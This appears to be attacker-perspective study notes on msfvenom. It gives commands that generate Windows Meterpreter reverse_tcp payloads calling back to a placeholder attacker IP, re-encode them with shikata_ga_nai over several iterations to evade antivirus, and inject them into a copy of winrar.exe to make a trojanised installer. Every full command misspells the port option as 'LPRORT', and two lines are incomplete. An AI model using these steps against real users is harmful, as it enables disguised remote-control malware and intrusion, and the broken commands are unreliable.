msfvenom

A client-side attack happens when an attacker tricks a user into running a harmful file on their computer. Once the file runs, it secretly connects back to the attacker.

Hackers often use social engineering to make people open infected documents or programs. Instead of attacking weak software or services, they target human mistakes—like clicking on unsafe links or opening suspicious files.

Since this type of attack places a harmful file on the user’s computer, attackers must be careful to avoid detection by antivirus (AV) software.

What is msfvenom?

msfvenom is a command-line tool used to create and encode harmful payloads for different operating systems and web servers. It combines two tools: msfpayload and msfencode.

With msfvenom, we can create a dangerous payload (like a Meterpreter payload) that can be sent to a target computer. Once the target runs the payload, it connects back to us and gives us remote control over their system.

msfvenom --list payloads

windows/x64/meterpreter/reverse_http
linux/x64/meterpreter/reverse_http

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -f exe > /home/payloadx86.exe

msfvenom --list formats

Encoding Payloads

Since this type of attack involves placing a malicious file on the client’s system (disk), attackers must be aware of antivirus (AV) detection. Most AV software uses signature-based detection to find harmful files or programs. To bypass older AV systems, attackers can encode their payloads. Encoding changes the payload's code in a way that alters its signature, making it harder for AV software to recognize it.

Shellcode is a small piece of code used as part of an attack. It’s called "shellcode" because it gives the attacker access to a command shell on the target system, allowing them to run commands remotely.

x86/shikata_ga_nai # polymorphic XOR additive feedback encoder

x86/shikata_ga_nai is a polymorphic XOR additive feedback encoder used in tools like msfvenom to encode payloads and help them avoid detection by antivirus software.

• x86 refers to the architecture of the system, typically meaning 32-bit Intel-based processors.

• Shikata_ga_nai is the name of this encoding technique. It comes from a Japanese phrase meaning "it can't be helped," symbolizing the persistence and effectiveness of the encoder.

• Polymorphic means the encoder changes the appearance of the payload each time it’s used, so the signature looks different, even though the payload itself remains the same.

• XOR additive feedback is a method used to modify the payload's code. It uses XOR (a binary operation) in combination with feedback loops to change the shellcode in a way that antivirus programs may not recognize it as malicious.

This encoder helps disguise the payload, making it harder for signature-based antivirus tools to detect it.

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe

# specifying iteration
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -i 10 -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe

Injecting Payloads to Windows Portable Executables

# The -x option allows you to specify a template or existing executable that you want to use as a starting point.
msfvenom -x 

# The -k option is used to keep the generated payload’s shellcode from having any specific exit functions.
msfvenom -k

# using winrar
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -x winrar.exe > /home/winrar.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPRORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -k -x winrar.exe > /home/winrar.exe